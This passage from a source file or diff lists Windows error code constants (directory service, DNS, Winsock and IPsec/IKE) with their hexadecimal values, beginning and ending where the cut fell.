0x2126 + ERROR_DS_NOT_AUTHORITIVE_FOR_DST_NC = 0x2127 + ERROR_DS_SRC_GUID_MISMATCH = 0x2128 + ERROR_DS_CANT_MOVE_DELETED_OBJECT = 0x2129 + ERROR_DS_PDC_OPERATION_IN_PROGRESS = 0x212A + ERROR_DS_CROSS_DOMAIN_CLEANUP_REQD = 0x212B + ERROR_DS_ILLEGAL_XDOM_MOVE_OPERATION = 0x212C + ERROR_DS_CANT_WITH_ACCT_GROUP_MEMBERSHPS = 0x212D + ERROR_DS_NC_MUST_HAVE_NC_PARENT = 0x212E + ERROR_DS_CR_IMPOSSIBLE_TO_VALIDATE = 0x212F + ERROR_DS_DST_DOMAIN_NOT_NATIVE = 0x2130 + ERROR_DS_MISSING_INFRASTRUCTURE_CONTAINER = 0x2131 + ERROR_DS_CANT_MOVE_ACCOUNT_GROUP = 0x2132 + ERROR_DS_CANT_MOVE_RESOURCE_GROUP = 0x2133 + ERROR_DS_INVALID_SEARCH_FLAG = 0x2134 + ERROR_DS_NO_TREE_DELETE_ABOVE_NC = 0x2135 + ERROR_DS_COULDNT_LOCK_TREE_FOR_DELETE = 0x2136 + ERROR_DS_COULDNT_IDENTIFY_OBJECTS_FOR_TREE_DELETE = 0x2137 + ERROR_DS_SAM_INIT_FAILURE = 0x2138 + ERROR_DS_SENSITIVE_GROUP_VIOLATION = 0x2139 + ERROR_DS_CANT_MOD_PRIMARYGROUPID = 0x213A + ERROR_DS_ILLEGAL_BASE_SCHEMA_MOD = 0x213B + ERROR_DS_NONSAFE_SCHEMA_CHANGE = 0x213C + ERROR_DS_SCHEMA_UPDATE_DISALLOWED = 0x213D + ERROR_DS_CANT_CREATE_UNDER_SCHEMA = 0x213E + ERROR_DS_INSTALL_NO_SRC_SCH_VERSION = 0x213F + ERROR_DS_INSTALL_NO_SCH_VERSION_IN_INIFILE = 0x2140 + ERROR_DS_INVALID_GROUP_TYPE = 0x2141 + ERROR_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN = 0x2142 + ERROR_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN = 0x2143 + ERROR_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER = 0x2144 + ERROR_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER = 0x2145 + ERROR_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER = 0x2146 + ERROR_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER = 0x2147 + ERROR_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER = 0x2148 + ERROR_DS_HAVE_PRIMARY_MEMBERS = 0x2149 + ERROR_DS_STRING_SD_CONVERSION_FAILED = 0x214A + ERROR_DS_NAMING_MASTER_GC = 0x214B + ERROR_DS_LOOKUP_FAILURE = 0x214C + ERROR_DS_COULDNT_UPDATE_SPNS = 0x214D + ERROR_DS_CANT_RETRIEVE_SD = 0x214E + ERROR_DS_KEY_NOT_UNIQUE = 0x214F + ERROR_DS_WRONG_LINKED_ATT_SYNTAX = 0x2150 + ERROR_DS_SAM_NEED_BOOTKEY_PASSWORD = 0x2151 + ERROR_DS_SAM_NEED_BOOTKEY_FLOPPY = 0x2152 + ERROR_DS_CANT_START = 0x2153 + ERROR_DS_INIT_FAILURE = 0x2154 + ERROR_DS_NO_PKT_PRIVACY_ON_CONNECTION = 0x2155 + ERROR_DS_SOURCE_DOMAIN_IN_FOREST = 0x2156 + ERROR_DS_DESTINATION_DOMAIN_NOT_IN_FOREST = 0x2157 + ERROR_DS_DESTINATION_AUDITING_NOT_ENABLED = 0x2158 + ERROR_DS_CANT_FIND_DC_FOR_SRC_DOMAIN = 0x2159 + ERROR_DS_SRC_OBJ_NOT_GROUP_OR_USER = 0x215A + ERROR_DS_SRC_SID_EXISTS_IN_FOREST = 0x215B + ERROR_DS_SRC_AND_DST_OBJECT_CLASS_MISMATCH = 0x215C + ERROR_SAM_INIT_FAILURE = 0x215D + ERROR_DS_DRA_SCHEMA_INFO_SHIP = 0x215E + ERROR_DS_DRA_SCHEMA_CONFLICT = 0x215F + ERROR_DS_DRA_EARLIER_SCHEMA_CONLICT = 0x2160 + ERROR_DS_DRA_OBJ_NC_MISMATCH = 0x2161 + ERROR_DS_NC_STILL_HAS_DSAS = 0x2162 + ERROR_DS_GC_REQUIRED = 0x2163 + ERROR_DS_LOCAL_MEMBER_OF_LOCAL_ONLY = 0x2164 + ERROR_DS_NO_FPO_IN_UNIVERSAL_GROUPS = 0x2165 + ERROR_DS_CANT_ADD_TO_GC = 0x2166 + ERROR_DS_NO_CHECKPOINT_WITH_PDC = 0x2167 + ERROR_DS_SOURCE_AUDITING_NOT_ENABLED = 0x2168 + ERROR_DS_CANT_CREATE_IN_NONDOMAIN_NC = 0x2169 + ERROR_DS_INVALID_NAME_FOR_SPN = 0x216A + ERROR_DS_FILTER_USES_CONTRUCTED_ATTRS = 0x216B + ERROR_DS_UNICODEPWD_NOT_IN_QUOTES = 0x216C + ERROR_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED = 0x216D + ERROR_DS_MUST_BE_RUN_ON_DST_DC = 0x216E + ERROR_DS_SRC_DC_MUST_BE_SP4_OR_GREATER = 0x216F + ERROR_DS_CANT_TREE_DELETE_CRITICAL_OBJ = 0x2170 + ERROR_DS_INIT_FAILURE_CONSOLE = 0x2171 + ERROR_DS_SAM_INIT_FAILURE_CONSOLE = 0x2172 + ERROR_DS_FOREST_VERSION_TOO_HIGH = 0x2173 + ERROR_DS_DOMAIN_VERSION_TOO_HIGH = 0x2174 + ERROR_DS_FOREST_VERSION_TOO_LOW = 0x2175 + ERROR_DS_DOMAIN_VERSION_TOO_LOW = 0x2176 + ERROR_DS_INCOMPATIBLE_VERSION = 0x2177 + ERROR_DS_LOW_DSA_VERSION = 0x2178 + ERROR_DS_NO_BEHAVIOR_VERSION_IN_MIXEDDOMAIN = 0x2179 + ERROR_DS_NOT_SUPPORTED_SORT_ORDER = 0x217A + ERROR_DS_NAME_NOT_UNIQUE = 0x217B + ERROR_DS_MACHINE_ACCOUNT_CREATED_PRENT4 = 0x217C + ERROR_DS_OUT_OF_VERSION_STORE = 0x217D + ERROR_DS_INCOMPATIBLE_CONTROLS_USED = 0x217E + ERROR_DS_NO_REF_DOMAIN = 0x217F + ERROR_DS_RESERVED_LINK_ID = 0x2180 + ERROR_DS_LINK_ID_NOT_AVAILABLE = 0x2181 + ERROR_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER = 0x2182 + ERROR_DS_MODIFYDN_DISALLOWED_BY_INSTANCE_TYPE = 0x2183 + ERROR_DS_NO_OBJECT_MOVE_IN_SCHEMA_NC = 0x2184 + ERROR_DS_MODIFYDN_DISALLOWED_BY_FLAG = 0x2185 + ERROR_DS_MODIFYDN_WRONG_GRANDPARENT = 0x2186 + ERROR_DS_NAME_ERROR_TRUST_REFERRAL = 0x2187 + ERROR_NOT_SUPPORTED_ON_STANDARD_SERVER = 0x2188 + ERROR_DS_CANT_ACCESS_REMOTE_PART_OF_AD = 0x2189 + ERROR_DS_CR_IMPOSSIBLE_TO_VALIDATE_V2 = 0x218A + ERROR_DS_THREAD_LIMIT_EXCEEDED = 0x218B + ERROR_DS_NOT_CLOSEST = 0x218C + ERROR_DS_CANT_DERIVE_SPN_WITHOUT_SERVER_REF = 0x218D + ERROR_DS_SINGLE_USER_MODE_FAILED = 0x218E + ERROR_DS_NTDSCRIPT_SYNTAX_ERROR = 0x218F + ERROR_DS_NTDSCRIPT_PROCESS_ERROR = 0x2190 + ERROR_DS_DIFFERENT_REPL_EPOCHS = 0x2191 + ERROR_DS_DRS_EXTENSIONS_CHANGED = 0x2192 + ERROR_DS_REPLICA_SET_CHANGE_NOT_ALLOWED_ON_DISABLED_CR = 0x2193 + ERROR_DS_NO_MSDS_INTID = 0x2194 + ERROR_DS_DUP_MSDS_INTID = 0x2195 + ERROR_DS_EXISTS_IN_RDNATTID = 0x2196 + ERROR_DS_AUTHORIZATION_FAILED = 0x2197 + ERROR_DS_INVALID_SCRIPT = 0x2198 + ERROR_DS_REMOTE_CROSSREF_OP_FAILED = 0x2199 + ERROR_DS_CROSS_REF_BUSY = 0x219A + ERROR_DS_CANT_DERIVE_SPN_FOR_DELETED_DOMAIN = 0x219B + ERROR_DS_CANT_DEMOTE_WITH_WRITEABLE_NC = 0x219C + ERROR_DS_DUPLICATE_ID_FOUND = 0x219D + ERROR_DS_INSUFFICIENT_ATTR_TO_CREATE_OBJECT = 0x219E + ERROR_DS_GROUP_CONVERSION_ERROR = 0x219F + ERROR_DS_CANT_MOVE_APP_BASIC_GROUP = 0x21A0 + ERROR_DS_CANT_MOVE_APP_QUERY_GROUP = 0x21A1 + ERROR_DS_ROLE_NOT_VERIFIED = 0x21A2 + ERROR_DS_WKO_CONTAINER_CANNOT_BE_SPECIAL = 0x21A3 + ERROR_DS_DOMAIN_RENAME_IN_PROGRESS = 0x21A4 + ERROR_DS_EXISTING_AD_CHILD_NC = 0x21A5 + ERROR_DS_REPL_LIFETIME_EXCEEDED = 0x21A6 + ERROR_DS_DISALLOWED_IN_SYSTEM_CONTAINER = 0x21A7 + ERROR_DS_LDAP_SEND_QUEUE_FULL = 0x21A8 + ERROR_DS_DRA_OUT_SCHEDULE_WINDOW = 0x21A9 + ERROR_DS_POLICY_NOT_KNOWN = 0x21AA + ERROR_NO_SITE_SETTINGS_OBJECT = 0x21AB + ERROR_NO_SECRETS = 0x21AC + ERROR_NO_WRITABLE_DC_FOUND = 0x21AD + ERROR_DS_NO_SERVER_OBJECT = 0x21AE + ERROR_DS_NO_NTDSA_OBJECT = 0x21AF + ERROR_DS_NON_ASQ_SEARCH = 0x21B0 + ERROR_DS_AUDIT_FAILURE = 0x21B1 + ERROR_DS_INVALID_SEARCH_FLAG_SUBTREE = 0x21B2 + ERROR_DS_INVALID_SEARCH_FLAG_TUPLE = 0x21B3 + ERROR_DS_HIERARCHY_TABLE_TOO_DEEP = 0x21B4 + ERROR_DS_DRA_CORRUPT_UTD_VECTOR = 0x21B5 + ERROR_DS_DRA_SECRETS_DENIED = 0x21B6 + ERROR_DS_RESERVED_MAPI_ID = 0x21B7 + ERROR_DS_MAPI_ID_NOT_AVAILABLE = 0x21B8 + ERROR_DS_DRA_MISSING_KRBTGT_SECRET = 0x21B9 + ERROR_DS_DOMAIN_NAME_EXISTS_IN_FOREST = 0x21BA + ERROR_DS_FLAT_NAME_EXISTS_IN_FOREST = 0x21BB + ERROR_INVALID_USER_PRINCIPAL_NAME = 0x21BC + ERROR_DS_OID_MAPPED_GROUP_CANT_HAVE_MEMBERS = 0x21BD + ERROR_DS_OID_NOT_FOUND = 0x21BE + ERROR_DS_DRA_RECYCLED_TARGET = 0x21BF + DNS_ERROR_RCODE_FORMAT_ERROR = 0x2329 + DNS_ERROR_RCODE_SERVER_FAILURE = 0x232A + DNS_ERROR_RCODE_NAME_ERROR = 0x232B + DNS_ERROR_RCODE_NOT_IMPLEMENTED = 0x232C + DNS_ERROR_RCODE_REFUSED = 0x232D + DNS_ERROR_RCODE_YXDOMAIN = 0x232E + DNS_ERROR_RCODE_YXRRSET = 0x232F + DNS_ERROR_RCODE_NXRRSET = 0x2330 + DNS_ERROR_RCODE_NOTAUTH = 0x2331 + DNS_ERROR_RCODE_NOTZONE = 0x2332 + DNS_ERROR_RCODE_BADSIG = 0x2338 + DNS_ERROR_RCODE_BADKEY = 0x2339 + DNS_ERROR_RCODE_BADTIME = 0x233A + DNS_INFO_NO_RECORDS = 0x251D + DNS_ERROR_BAD_PACKET = 0x251E + DNS_ERROR_NO_PACKET = 0x251F + DNS_ERROR_RCODE = 0x2520 + DNS_ERROR_UNSECURE_PACKET = 0x2521 + DNS_ERROR_INVALID_TYPE = 0x254F + DNS_ERROR_INVALID_IP_ADDRESS = 0x2550 + DNS_ERROR_INVALID_PROPERTY = 0x2551 + DNS_ERROR_TRY_AGAIN_LATER = 0x2552 + DNS_ERROR_NOT_UNIQUE = 0x2553 + DNS_ERROR_NON_RFC_NAME = 0x2554 + DNS_STATUS_FQDN = 0x2555 + DNS_STATUS_DOTTED_NAME = 0x2556 + DNS_STATUS_SINGLE_PART_NAME = 0x2557 + DNS_ERROR_INVALID_NAME_CHAR = 0x2558 + DNS_ERROR_NUMERIC_NAME = 0x2559 + DNS_ERROR_NOT_ALLOWED_ON_ROOT_SERVER = 0x255A + DNS_ERROR_NOT_ALLOWED_UNDER_DELEGATION = 0x255B + DNS_ERROR_CANNOT_FIND_ROOT_HINTS = 0x255C + DNS_ERROR_INCONSISTENT_ROOT_HINTS = 0x255D + DNS_ERROR_DWORD_VALUE_TOO_SMALL = 0x255E + DNS_ERROR_DWORD_VALUE_TOO_LARGE = 0x255F + DNS_ERROR_BACKGROUND_LOADING = 0x2560 + DNS_ERROR_NOT_ALLOWED_ON_RODC = 0x2561 + DNS_ERROR_NOT_ALLOWED_UNDER_DNAME = 0x2562 + DNS_ERROR_DELEGATION_REQUIRED = 0x2563 + DNS_ERROR_INVALID_POLICY_TABLE = 0x2564 + DNS_ERROR_ZONE_DOES_NOT_EXIST = 0x2581 + DNS_ERROR_NO_ZONE_INFO = 0x2582 + DNS_ERROR_INVALID_ZONE_OPERATION = 0x2583 + DNS_ERROR_ZONE_CONFIGURATION_ERROR = 0x2584 + DNS_ERROR_ZONE_HAS_NO_SOA_RECORD = 0x2585 + DNS_ERROR_ZONE_HAS_NO_NS_RECORDS = 0x2586 + DNS_ERROR_ZONE_LOCKED = 0x2587 + DNS_ERROR_ZONE_CREATION_FAILED = 0x2588 + DNS_ERROR_ZONE_ALREADY_EXISTS = 0x2589 + DNS_ERROR_AUTOZONE_ALREADY_EXISTS = 0x258A + DNS_ERROR_INVALID_ZONE_TYPE = 0x258B + DNS_ERROR_SECONDARY_REQUIRES_MASTER_IP = 0x258C + DNS_ERROR_ZONE_NOT_SECONDARY = 0x258D + DNS_ERROR_NEED_SECONDARY_ADDRESSES = 0x258E + DNS_ERROR_WINS_INIT_FAILED = 0x258F + DNS_ERROR_NEED_WINS_SERVERS = 0x2590 + DNS_ERROR_NBSTAT_INIT_FAILED = 0x2591 + DNS_ERROR_SOA_DELETE_INVALID = 0x2592 + DNS_ERROR_FORWARDER_ALREADY_EXISTS = 0x2593 + DNS_ERROR_ZONE_REQUIRES_MASTER_IP = 0x2594 + DNS_ERROR_ZONE_IS_SHUTDOWN = 0x2595 + DNS_ERROR_PRIMARY_REQUIRES_DATAFILE = 0x25B3 + DNS_ERROR_INVALID_DATAFILE_NAME = 0x25B4 + DNS_ERROR_DATAFILE_OPEN_FAILURE = 0x25B5 + DNS_ERROR_FILE_WRITEBACK_FAILED = 0x25B6 + DNS_ERROR_DATAFILE_PARSING = 0x25B7 + DNS_ERROR_RECORD_DOES_NOT_EXIST = 0x25E5 + DNS_ERROR_RECORD_FORMAT = 0x25E6 + DNS_ERROR_NODE_CREATION_FAILED = 0x25E7 + DNS_ERROR_UNKNOWN_RECORD_TYPE = 0x25E8 + DNS_ERROR_RECORD_TIMED_OUT = 0x25E9 + DNS_ERROR_NAME_NOT_IN_ZONE = 0x25EA + DNS_ERROR_CNAME_LOOP = 0x25EB + DNS_ERROR_NODE_IS_CNAME = 0x25EC + DNS_ERROR_CNAME_COLLISION = 0x25ED + DNS_ERROR_RECORD_ONLY_AT_ZONE_ROOT = 0x25EE + DNS_ERROR_RECORD_ALREADY_EXISTS = 0x25EF + DNS_ERROR_SECONDARY_DATA = 0x25F0 + DNS_ERROR_NO_CREATE_CACHE_DATA = 0x25F1 + DNS_ERROR_NAME_DOES_NOT_EXIST = 0x25F2 + DNS_WARNING_PTR_CREATE_FAILED = 0x25F3 + DNS_WARNING_DOMAIN_UNDELETED = 0x25F4 + DNS_ERROR_DS_UNAVAILABLE = 0x25F5 + DNS_ERROR_DS_ZONE_ALREADY_EXISTS = 0x25F6 + DNS_ERROR_NO_BOOTFILE_IF_DS_ZONE = 0x25F7 + DNS_ERROR_NODE_IS_DNAME = 0x25F8 + DNS_ERROR_DNAME_COLLISION = 0x25F9 + DNS_ERROR_ALIAS_LOOP = 0x25FA + DNS_INFO_AXFR_COMPLETE = 0x2617 + DNS_ERROR_AXFR = 0x2618 + DNS_INFO_ADDED_LOCAL_WINS = 0x2619 + DNS_STATUS_CONTINUE_NEEDED = 0x2649 + DNS_ERROR_NO_TCPIP = 0x267B + DNS_ERROR_NO_DNS_SERVERS = 0x267C + DNS_ERROR_DP_DOES_NOT_EXIST = 0x26AD + DNS_ERROR_DP_ALREADY_EXISTS = 0x26AE + DNS_ERROR_DP_NOT_ENLISTED = 0x26AF + DNS_ERROR_DP_ALREADY_ENLISTED = 0x26B0 + DNS_ERROR_DP_NOT_AVAILABLE = 0x26B1 + DNS_ERROR_DP_FSMO_ERROR = 0x26B2 + WSAEINTR = 0x2714 + WSAEBADF = 0x2719 + WSAEACCES = 0x271D + WSAEFAULT = 0x271E + WSAEINVAL = 0x2726 + WSAEMFILE = 0x2728 + WSAEWOULDBLOCK = 0x2733 + WSAEINPROGRESS = 0x2734 + WSAEALREADY = 0x2735 + WSAENOTSOCK = 0x2736 + WSAEDESTADDRREQ = 0x2737 + WSAEMSGSIZE = 0x2738 + WSAEPROTOTYPE = 0x2739 + WSAENOPROTOOPT = 0x273A + WSAEPROTONOSUPPORT = 0x273B + WSAESOCKTNOSUPPORT = 0x273C + WSAEOPNOTSUPP = 0x273D + WSAEPFNOSUPPORT = 0x273E + WSAEAFNOSUPPORT = 0x273F + WSAEADDRINUSE = 0x2740 + WSAEADDRNOTAVAIL = 0x2741 + WSAENETDOWN = 0x2742 + WSAENETUNREACH = 0x2743 + WSAENETRESET = 0x2744 + WSAECONNABORTED = 0x2745 + WSAECONNRESET = 0x2746 + WSAENOBUFS = 0x2747 + WSAEISCONN = 0x2748 + WSAENOTCONN = 0x2749 + WSAESHUTDOWN = 0x274A + WSAETOOMANYREFS = 0x274B + WSAETIMEDOUT = 0x274C + WSAECONNREFUSED = 0x274D + WSAELOOP = 0x274E + WSAENAMETOOLONG = 0x274F + WSAEHOSTDOWN = 0x2750 + WSAEHOSTUNREACH = 0x2751 + WSAENOTEMPTY = 0x2752 + WSAEPROCLIM = 0x2753 + WSAEUSERS = 0x2754 + WSAEDQUOT = 0x2755 + WSAESTALE = 0x2756 + WSAEREMOTE = 0x2757 + WSASYSNOTREADY = 0x276B + WSAVERNOTSUPPORTED = 0x276C + WSANOTINITIALISED = 0x276D + WSAEDISCON = 0x2775 + WSAENOMORE = 0x2776 + WSAECANCELLED = 0x2777 + WSAEINVALIDPROCTABLE = 0x2778 + WSAEINVALIDPROVIDER = 0x2779 + WSAEPROVIDERFAILEDINIT = 0x277A + WSASYSCALLFAILURE = 0x277B + WSASERVICE_NOT_FOUND = 0x277C + WSATYPE_NOT_FOUND = 0x277D + WSA_E_NO_MORE = 0x277E + WSA_E_CANCELLED = 0x277F + WSAEREFUSED = 0x2780 + WSAHOST_NOT_FOUND = 0x2AF9 + WSATRY_AGAIN = 0x2AFA + WSANO_RECOVERY = 0x2AFB + WSANO_DATA = 0x2AFC + WSA_QOS_RECEIVERS = 0x2AFD + WSA_QOS_SENDERS = 0x2AFE + WSA_QOS_NO_SENDERS = 0x2AFF + WSA_QOS_NO_RECEIVERS = 0x2B00 + WSA_QOS_REQUEST_CONFIRMED = 0x2B01 + WSA_QOS_ADMISSION_FAILURE = 0x2B02 + WSA_QOS_POLICY_FAILURE = 0x2B03 + WSA_QOS_BAD_STYLE = 0x2B04 + WSA_QOS_BAD_OBJECT = 0x2B05 + WSA_QOS_TRAFFIC_CTRL_ERROR = 0x2B06 + WSA_QOS_GENERIC_ERROR = 0x2B07 + WSA_QOS_ESERVICETYPE = 0x2B08 + WSA_QOS_EFLOWSPEC = 0x2B09 + WSA_QOS_EPROVSPECBUF = 0x2B0A + WSA_QOS_EFILTERSTYLE = 0x2B0B + WSA_QOS_EFILTERTYPE = 0x2B0C + WSA_QOS_EFILTERCOUNT = 0x2B0D + WSA_QOS_EOBJLENGTH = 0x2B0E + WSA_QOS_EFLOWCOUNT = 0x2B0F + WSA_QOS_EUNKNOWNPSOBJ = 0x2B10 + WSA_QOS_EPOLICYOBJ = 0x2B11 + WSA_QOS_EFLOWDESC = 0x2B12 + WSA_QOS_EPSFLOWSPEC = 0x2B13 + WSA_QOS_EPSFILTERSPEC = 0x2B14 + WSA_QOS_ESDMODEOBJ = 0x2B15 + WSA_QOS_ESHAPERATEOBJ = 0x2B16 + WSA_QOS_RESERVED_PETYPE = 0x2B17 + ERROR_IPSEC_QM_POLICY_EXISTS = 0x32C8 + ERROR_IPSEC_QM_POLICY_NOT_FOUND = 0x32C9 + ERROR_IPSEC_QM_POLICY_IN_USE = 0x32CA + ERROR_IPSEC_MM_POLICY_EXISTS = 0x32CB + ERROR_IPSEC_MM_POLICY_NOT_FOUND = 0x32CC + ERROR_IPSEC_MM_POLICY_IN_USE = 0x32CD + ERROR_IPSEC_MM_FILTER_EXISTS = 0x32CE + ERROR_IPSEC_MM_FILTER_NOT_FOUND = 0x32CF + ERROR_IPSEC_TRANSPORT_FILTER_EXISTS = 0x32D0 + ERROR_IPSEC_TRANSPORT_FILTER_NOT_FOUND = 0x32D1 + ERROR_IPSEC_MM_AUTH_EXISTS = 0x32D2 + ERROR_IPSEC_MM_AUTH_NOT_FOUND = 0x32D3 + ERROR_IPSEC_MM_AUTH_IN_USE = 0x32D4 + ERROR_IPSEC_DEFAULT_MM_POLICY_NOT_FOUND = 0x32D5 + ERROR_IPSEC_DEFAULT_MM_AUTH_NOT_FOUND = 0x32D6 + ERROR_IPSEC_DEFAULT_QM_POLICY_NOT_FOUND = 0x32D7 + ERROR_IPSEC_TUNNEL_FILTER_EXISTS = 0x32D8 + ERROR_IPSEC_TUNNEL_FILTER_NOT_FOUND = 0x32D9 + ERROR_IPSEC_MM_FILTER_PENDING_DELETION = 0x32DA + ERROR_IPSEC_TRANSPORT_FILTER_PENDING_DELETION = 0x32DB + ERROR_IPSEC_TUNNEL_FILTER_PENDING_DELETION = 0x32DC + ERROR_IPSEC_MM_POLICY_PENDING_DELETION = 0x32DD + ERROR_IPSEC_MM_AUTH_PENDING_DELETION = 0x32DE + ERROR_IPSEC_QM_POLICY_PENDING_DELETION = 0x32DF + WARNING_IPSEC_MM_POLICY_PRUNED = 0x32E0 + WARNING_IPSEC_QM_POLICY_PRUNED = 0x32E1 + ERROR_IPSEC_IKE_AUTH_FAIL = 0x35E9 + ERROR_IPSEC_IKE_ATTRIB_FAIL = 0x35EA + ERROR_IPSEC_IKE_NEGOTIATION_PENDING = 0x35EB + ERROR_IPSEC_IKE_GENERAL_PROCESSING_ERROR = 0x35EC + ERROR_IPSEC_IKE_TIMED_OUT = 0x35ED + ERROR_IPSEC_IKE_NO_CERT = 0x35EE + ERROR_IPSEC_IKE_SA_DELETED = 0x35EF + ERROR_IPSEC_IKE_SA_REAPED = 0x35F0 + ERROR_IPSEC_IKE_MM_ACQUIRE_DROP = 0x35F1 + ERROR_IPSEC_IKE_QM_ACQUIRE_DROP = 0x35F2 + ERROR_IPSEC_IKE_QUEUE_DROP_MM = 0x35F3 + ERROR_IPSEC_IKE_QUEUE_DROP_NO_MM = 0x35F4 + ERROR_IPSEC_IKE_DROP_NO_RESPONSE = 0x35F5 + ERROR_IPSEC_IKE_MM_DELAY_DROP = 0x35F6 + ERROR_IPSEC_IKE_QM_DELAY_DROP = 0x35F7 + ERROR_IPSEC_IKE_ERROR = 0x35F8 + ERROR_IPSEC_IKE_CRL_FAILED = 0x35F9 + ERROR_IPSEC_IKE_INVALID_KEY_USAGE = 0x35FA + ERROR_IPSEC_IKE_INVALID_CERT_TYPE = 0x35FB + ERROR_IPSEC_IKE_NO_PRIVATE_KEY = 0x35FC + ERROR_IPSEC_IKE_DH_FAIL = 0x35FE + ERROR_IPSEC_IKE_CRITICAL_PAYLOAD_NOT_RECOGNIZED = 0x35FF + ERROR_IPSEC_IKE_INVALID_HEADER = 0x3600 + ERROR_IPSEC_IKE_NO_POLICY = 0x3601 + ERROR_IPSEC_IKE_INVALID_SIGNATURE = 0x3602 + ERROR_IPSEC_IKE_KERBEROS_ERROR = 0x3603 + ERROR_IPSEC_IKE_NO_PUBLIC_KEY = 0x3604 + ERROR_IPSEC_IKE_PROCESS_ERR = 0x3605 + ERROR_IPSEC_IKE_PROCESS_ERR_SA = 0x3606 + ERROR_IPSEC_IKE_PROCESS_ERR_PROP = 0x3607 + ERROR_IPSEC_IKE_PROCESS_ERR_TRANS = 0x3608 + ERROR_IPSEC_IKE_PROCESS_ERR_KE = 0x3609 + ERROR_IPSEC_IKE_PROCESS_ERR_ID = 0x360A + ERROR_IPSEC_IKE_PROCESS_ERR_CERT = 0x360B + ERROR_IPSEC_IKE_PROCESS_ERR_CERT_REQ = 0x360C + ERROR_IPSEC_IKE_PROCESS_ERR_HASH = 0x360D + ERROR_IPSEC_IKE_PROCESS_ERR_SIG = 0x360E + ERROR_IPSEC_IKE_PROCESS_ERR_NONCE = 0x360F + ERROR_IPSEC_IKE_PROCESS_ERR_NOTIFY = 0x3610 + ERROR_IPSEC_IKE_PROCESS_ERR_DELETE = 0x3611 + ERROR_IPSEC_IKE_PROCESS_ERR_VENDOR = 0x3612 + ERROR_IPSEC_IKE_INVALID_PAYLOAD = 0x3613 + ERROR_IPSEC_IKE_LOAD_SOFT_SA = 0x3614 + ERROR_IPSEC_IKE_SOFT_SA_TORN_DOWN = 0x3615 + ERROR_IPSEC_IKE_INVALID_COOKIE = 0x3616 + ERROR_IPSEC_IKE_NO_PEER_CERT = 0x3617 + ERROR_IPSEC_IKE_PEER_CRL_FAILED = 0x3618 + ERROR_IPSEC_IKE_POLICY_CHANGE = 0x3619 + ERROR_IPSEC_IKE_NO_MM_POLICY = 0x361A + ERROR_IPSEC_IKE_NOTCBPRIV = 0x361B + ERROR_IPSEC_IKE_SECLOADFAIL = 0x361C + ERROR_IPSEC_IKE_FAILSSPINIT = 0x361D + ERROR_IPSEC_IKE_FAILQUERYSSP = 0x361E + ERROR_IPSEC_IKE_SRVACQFAIL = 0x361F + ERROR_IPSEC_IKE_SRVQUERYCRED = 0x3620 + ERROR_IPSEC_IKE_GETSPIFAIL = 0x3621 + ERROR_IPSEC_IKE_INVALID_FILTER = 0x3622 + ERROR_IPSEC_IKE_OUT_OF_MEMORY = 0x3623 + ERROR_IPSEC_IKE_ADD_UPDATE_KEY_FAILED = 0x3624 + ERROR_IPSEC_IKE_INVALID_POLICY = 0x3625 + ERROR_IPSEC_IKE_UNKNOWN_DOI = 0x3626 + ERROR_IPSEC_IKE_INVALID_SITUATION = 0x3627 + ERROR_IPSEC_IKE_DH_FAILURE = 0x3628 + ERROR_IPSEC_IKE_INVALID_GROUP = 0x3629 + ERROR_IPSEC_IKE_ENCRYPT = 0x362A + ERROR_IPSEC_IKE_DECRYPT = 0x362B + ERROR_IPSEC_IKE_POLICY_MATCH = 0x362C + ERROR_IPSEC_IKE_UNSUPPORTED_ID = 0x362D + ERROR_IPSEC_IKE_INVALID_HASH = 0x362E + ERROR_IPSEC_IKE_INVALID_HASH_ALG = 0x362F + ERROR_IPSEC_IKE_INVALID_HASH_SIZE = 0x3630 + ERROR_IPSEC_IKE_INVALID_ENCRYPT_ALG = 0x3631 + ERROR_IPSEC_IKE_INVALID_AUTH_ALG = 0x3632 + ERROR_IPSEC_IKE_INVALID_SIG = 0x3633 + ERROR_IPSEC_IKE_LOAD_FAILED = 0x3634 + ERROR_IPSEC_IKE_RPC_DELETE = 0x3635 + ERROR_IPSEC_IKE_BENIGN_REINIT = 0x3636 + ERROR_IPSEC_IKE_INVALID_RESPONDER_LIFETIME_NOTIFY = 0x3637 + ERROR_IPSEC_IKE_QM_LIMIT_REAP = 0x3638 + ERROR_IPSEC_IKE_INVALID_CERT_KEYLEN = 0x3639 + ERROR_IPSEC_IKE_MM_LIMIT = 0x363A + ERROR_IPSEC_IKE_NEGOTIATION_DISABLED = 0x363B + ERROR_IPSEC_IKE_QM_LIMIT = 0x363C + ERROR_IPSEC_IKE_MM_EXPIRED = 0x363D + ERROR_IPSEC_IKE_PEER_MM_ASSUMED_INVALID = 0x363E + ERROR_IPSEC_IKE_CERT_CHAIN_POLICY_MISMATCH = 0x363F + ERROR_IPSEC_IKE_UNEXPECTED_MESSAGE_ID = 0x3640 + ERROR_IPSEC_IKE_INVALID_AUTH_PAYLOAD = 0x3641 + ERROR_IPSEC_IKE_DOS_COOKIE_SENT = 0x3642 + ERROR_IPSEC_IKE_SHUTTING_DOWN = 0x3643 + ERROR_IPSEC_IKE_CGA_AUTH_FAILED = 0x3644 + ERROR_IPSEC_IKE_PROCESS_ERR_NATOA = 0x3645 + ERROR_IPSEC_IKE_INVALID_MM_FOR_QM = 0x3646 + ERROR_IPSEC_IKE_QM_EXPIRED = 0x3647 + ERROR_IPSEC_IKE_TOO_MANY_FILTERS = 0x3648 + ERROR_IPSEC_IKE_NEG_STATUS_END = 0x3649 + ERROR_IPSEC_IKE_KILL_DUMMY_NAP_TUNNEL = 0x364A + ERROR_IPSEC_IKE_INNER_IP_ASSIGNMENT_FAILURE = 0x364B + ERROR_IPSEC_IKE_REQUIRE_CP_PAYLOAD_MISSING = 0x364C + ERROR_IPSEC_KEY_MODULE_IMPERSONATION_NEGOTIATION_PENDING = 0x364D + ERROR_IPSEC_IKE_COEXISTENCE_SUPPRESS = 0x364E + ERROR_IPSEC_IKE_RATELIMIT_DROP = 0x364F + ERROR_IPSEC_IKE_PEER_DOESNT_SUPPORT_MOBIKE = 0x3650 + ERROR_IPSEC_IKE_AUTHORIZATION_FAILURE = 0x3651 + 